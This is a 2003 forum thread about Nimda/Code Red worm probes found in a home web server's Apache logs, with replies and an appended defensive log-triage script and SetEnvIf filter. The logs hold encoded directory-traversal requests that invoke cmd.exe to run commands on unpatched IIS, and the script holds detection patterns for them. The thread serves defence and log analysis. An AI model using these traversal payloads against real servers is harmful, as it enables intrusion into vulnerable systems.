#1
Attempted Hack??
Hi
Having just set up a web server on my home computer I was surprised to find this (and several identical) hack attack in my logs. I'm pretty confident I have everything nailed down (but not complacent). Wondered if anyone had any comment about this visitor?? As they originate from blueyonder IP addresses I'm planning to report them.
Steve

80.192.153.210 - - [02/Mar/2003:20:35:33 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 214 "-" "-"
80.192.153.210 - - [02/Mar/2003:20:35:33 +0000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 212 "-" "-"
80.192.153.210 - - [02/Mar/2003:20:35:33 +0000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 222 "-" "-"
80.192.153.210 - - [02/Mar/2003:20:35:33 +0000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 222 "-" "-"
80.192.153.210 - - [02/Mar/2003:20:35:33 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 236 "-" "-"
80.192.153.210 - - [02/Mar/2003:20:35:33 +0000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 253 "-" "-"
80.192.153.210 - - [02/Mar/2003:20:35:33 +0000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 253 "-" "-"
80.192.153.210 - - [02/Mar/2003:20:35:34 +0000] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 269 "-" "-"
80.192.153.210 - - [02/Mar/2003:20:35:34 +0000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235 "-" "-"
80.192.153.210 - - [02/Mar/2003:20:35:35 +0000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235 "-" "-"
80.192.153.210 - - [02/Mar/2003:20:35:35 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235 "-" "-"
80.192.153.210 - - [02/Mar/2003:20:35:35 +0000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235 "-" "-"
80.192.153.210 - - [02/Mar/2003:20:35:35 +0000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 226 "-" "-"
80.192.153.210 - - [02/Mar/2003:20:35:36 +0000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 226 "-" "-"
80.192.153.210 - - [02/Mar/2003:20:35:36 +0000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 236 "-" "-"
80.192.153.210 - - [02/Mar/2003:20:35:36 +0000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 236 "-" "-"
#2
Yes, it's a hack attempt.
But nothing to be done about it. They happen at least 3-10 times per day at our company's web server (non-public!). Some people are just too lazy to upgrade - you can tell them as often as you want... this makes the worms on the 'net stay alive. No need to worry if you secured your server.
__________________
-- Manuel Hirsch - Linux, FreeBSD, programming, administration articles, tutorials and more.
#3
In .htaccess, change to prevent the server virus from writing false error messages:
Redirect /scripts http://www.stoptheviruscold.invalid
Redirect /MSADC http://www.stoptheviruscold.invalid
#4
Thanks for info
Further investigation shows it to be a NIMBA virus trying to get to my machine. I quite like the redirect idea, but I'm not sure what advantage it offers over my own 404 message (my server is set up with non-standard dir names and very limited access, so standard attacks like this shouldn't get anywhere). Any real attack would spot the redirected http address and realise what the target site was doing. Interestingly, did you know you can't rename cmd.exe in win2000? If you do, win2000 re-creates it at boot!! Just shows that win 2000 still needs DOS. Steve
#5
Quote:
No. This shows that Win2k is trying not to allow you to render the system unusable. This (the "magic" re-appearing - also if you delete the file) happens with all files in the system and system32 folders (and some more too). It's called PC-Health and was first introduced on WinME. Win2K and XP have it too, but I think it has another name now.
#6
This *NIMDA* worm is incredibly popular; a lot, and I mean a lot, of people were infected with it a while ago and are still being infected with it.
If your server's secured against this type of intrusion you have nothing to worry about. The re-direction thing is a good idea for the users' sake: most of the people who are infected with this (if not all) don't have a clue that they are, so re-directing them to a page explaining what they have on the box and steps to removal could be really appreciated by a lot of them. Most of the people who are making these types of requests are actually still vulnerable to the attack themselves (are running unpatched boxes), so anyone can access their machines. That's why that re-direction thing could be good / helpful (something I did on my server a while back). All the best
#7
Nimda/CodeRed doesn't care what Redirect Apache sends; thus, instructing it to redirect anywhere does not do what you think it would do.
If you just don't want attempts like that to show up in your log, just use SetEnvIf to filter them out. Don't ask me how (I have replied over a hundred times on this issue already), just search SetEnvIf under my username.
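An added example, not part of any post in this thread, that serves the log excerpt in post #1 and the SetEnvIf suggestion in post #7 from the defender's side: the Python below parses Apache combined-format lines, flags the cmd.exe/root.exe probes by the same kind of pattern one would hand to SetEnvIf, counts them per source address (useful for the abuse report Steve mentions), and percent-decodes the request path repeatedly so the `..%255c..` style sequences read as the `..\..` they resolve to. The sample log is constructed here: three lines copied from post #1 plus one ordinary request from the documentation address 192.0.2.10; the regular expressions and function names are this example's own choices.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample: three probe lines as they appear in post #1 of this
# thread plus one ordinary request (192.0.2.10, a documentation address)
# added here for contrast.
SAMPLE_LOG = """\
80.192.153.210 - - [02/Mar/2003:20:35:33 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 214 "-" "-"
80.192.153.210 - - [02/Mar/2003:20:35:33 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 236 "-" "-"
80.192.153.210 - - [02/Mar/2003:20:35:35 +0000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 226 "-" "-"
192.0.2.10 - - [02/Mar/2003:20:40:01 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0 (constructed)"
"""

# Apache "combined" format. The request line is captured as one string
# because the malformed probes (status 400) are not always "METHOD PATH PROTO".
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# What the thread's probes have in common: they ask for cmd.exe or root.exe,
# or walk into /winnt/system32/ through a percent-encoded "..\" sequence.
PROBE_RE = re.compile(
    r'cmd\.exe|root\.exe|/winnt/system32/|\.\.%[0-9a-f%]+\.\./', re.IGNORECASE
)


def parse_line(line):
    """Return the fields of one log line as a dict, or None if it is not CLF."""
    m = CLF_RE.match(line)
    return m.groupdict() if m else None


def is_worm_probe(entry):
    """True when the request matches the Nimda/Code Red probe signature."""
    return PROBE_RE.search(entry["request"]) is not None


def decode_path(path, rounds=3):
    """Percent-decode repeatedly (the behaviour the probes rely on) so the
    path the worm actually aimed at is visible to the analyst."""
    for _ in range(rounds):
        decoded = unquote(path, errors="replace")
        if decoded == path:
            break
        path = decoded
    return path


def triage(log_text):
    """Split a log into ordinary entries and worm probes; count probes per IP."""
    keep, probes = [], []
    per_ip = Counter()
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue  # not a log line we understand; skip rather than crash
        if is_worm_probe(entry):
            probes.append(entry)
            per_ip[entry["ip"]] += 1
        else:
            keep.append(entry)
    return keep, probes, per_ip


if __name__ == "__main__":
    keep, probes, per_ip = triage(SAMPLE_LOG)
    for e in probes:
        parts = e["request"].split(" ")
        target = parts[1] if len(parts) > 1 else e["request"]
        print(f"{e['ip']} {e['status']} {target} -> {decode_path(target)}")
    print("probes per source:", dict(per_ip))
    print("ordinary requests:", len(keep))
```

The equivalent in Apache's own configuration is `SetEnvIf Request_URI "(cmd|root)\.exe" worm_probe` followed by `CustomLog logs/access_log combined env=!worm_probe`, which is the SetEnvIf approach post #7 refers to. One caveat for anyone who, like the original poster, intends to report the source addresses: dropping the lines discards the evidence, so a second `CustomLog logs/probes_log combined env=worm_probe` that sends them to their own file keeps the main log readable without losing them.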
Viewing: Dev Shed Forums > System Administration > Security and Cryptography > Attempted Hack??